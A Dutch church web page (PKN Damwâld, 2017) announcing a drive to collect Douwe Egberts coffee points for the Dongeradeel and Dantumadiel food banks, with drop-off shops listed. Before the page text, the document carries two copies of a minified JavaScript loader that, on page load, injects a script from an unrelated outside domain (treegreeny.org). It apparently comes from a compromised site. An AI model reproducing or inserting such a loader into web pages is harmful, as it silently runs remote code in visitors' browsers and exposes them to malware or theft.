;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Inzamelactie DE-waardepunten voor onze voedselbank - PKN Damwâld

Inzamelactie DE-waardepunten voor onze voedselbank

Gepubliceerd op: donderdag 9 februari 2017

Het zijn moeilijke tijden voor veel mensen: niet iedereen profiteert van een beter wordende economie. Duizenden gezinnen leven onder de armoedegrens. Gelukkig kan de voedselbank een aantal van deze mensen ondersteunen met een wekelijks voedselpakket. Koffie lijkt een luxeproduct, maar je kunt je voorstellen dat deze mensen een moment van ontspanning kunnen gebruiken. Koffie komt echter sporadisch voor in onze pakketten. Een pak koffie in het pakket is een klein gebaar, maar wordt zeer gewaardeerd.
De voedselbanken van Dongeradeel en Dantumadiel, in samenwerking met de Lionsclubs; Dokkum-Bonifatius & Noordoost Friesland, schieten daarom te hulp met het inzamelen van Douwe Egberts Waardepunten. De door jou ingeleverde waardepunten worden verzilverd voor pakken koffie. Deze pakken worden gedoneerd aan de voedselbank. Douwe Egberts steunt deze actie, want het merk wil mensen in Nederland dichterbij elkaar brengen. Koffie kan gezien worden als een uitnodiging om contact te maken met elkaar, en door dat contact worden onderling bestaande banden versterkt. Douwe Egberts heeft dan ook toegezegd alle donaties met 15% te verhogen!
Geef je D.E.-waardepunten zijn waarde en stel deze ter beschikking aan de voedselbank! Je waardepunten, bij voorkeur geteld, kun je gedurende de hele maand februari inleveren op de volgende adressen:
Anjum: Coop
Damwâld: Spar, Albert Heijn
De Westereen: Coop, Poiesz
Dokkum: Albert Heijn, Jumbo, Spar, Poiesz
Feanwâlden: Plus
Oosternijkerk: Attent Mook
In zowel Dantumadiel als Dongeradeel doen ook diverse scholen mee aan de inzamelactie.